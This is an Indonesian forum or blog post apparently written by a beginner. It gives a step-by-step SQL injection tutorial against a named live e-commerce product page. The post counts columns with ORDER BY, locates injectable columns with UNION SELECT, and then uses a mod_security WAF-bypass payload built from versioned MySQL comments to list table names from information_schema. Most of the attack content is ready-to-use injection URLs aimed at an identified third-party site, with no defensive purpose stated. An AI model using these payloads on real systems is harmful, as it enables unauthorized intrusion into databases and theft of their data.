yuk langsung aja , kali ini saya akan membahas cara bypass WAF (mod_security) pada SQL Injection . maaf kalo thread nya agak acak-acakan maklum masih nubie dan thread pertama
Target:
Quote:http://www.harshstones.com/product-detail.php?id=35
Step 1 :
Sekarang kita cari jumlah table databasenya dengan perintah " Order by "
Quote:http://www.harshstones.com/product-detail.php?id=35 order by 1-- NormalBerarti jumlah table databasenya adalah 12
http://www.harshstones.com/product-detail.php?id=35 order by 2-- Normal
http://www.harshstones.com/product-detail.php?id=35 order by 6-- Normal
http://www.harshstones.com/product-detail.php?id=35 order by 12-- Normal
http://www.harshstones.com/product-detail.php?id=35 order by 13-- Error
Step 2 :
Sekarang kita cari "angka ajaib" yang bisa kita injeksi di step sejanjutnya dengan perintah " union select ".
Sekarang kita jalankan perintahnya
http://www.harshstones.com/product-detail.php?id=-35 union select 1,2,3,4,5,6,7,8,9,10,11,12--
Dan yang terjadi
![[Image: 0r3YKNS.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_tRyFajlC9T-1z5NOFQbjW1CqSHCsqebqxLdNo0GxUivmdmRSWACa8Vrb1KbMw67dTfUME-T1ICkJXzIUytv5hXUQ=s0-d)
Step 3 :
Sekarang kita bypass dengan perintah :
Quote:/*!50000UNION*/+/*!50000SELECT*/+1,2,concat/*!50000%280x3c62723e,table_name%29*/,4,5,6,7,8,9+from+/*!information_schema*/.tables+where+/*!table_schema*/=database()--+
kita coba dengan site yang tadi
Quote:http://www.harshstones.com/product-detai...10,11,12--Dan keluarlah "angka ajaib" itu
![[Image: SB9Eq5d.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_upGcY70Se_RfbWm94GB7T3mPoEXxgCGUC64iXjENFI8NDBkJvsBrzlY8IUf3_SrnMJeVOKKtS5MP2OYZ1qLrXVLQ=s0-d)
Sekian tutor dari saya semoga bermanfaat
0 Response to "Tutorial Bypass WAF (Mod_Security) "
Post a Comment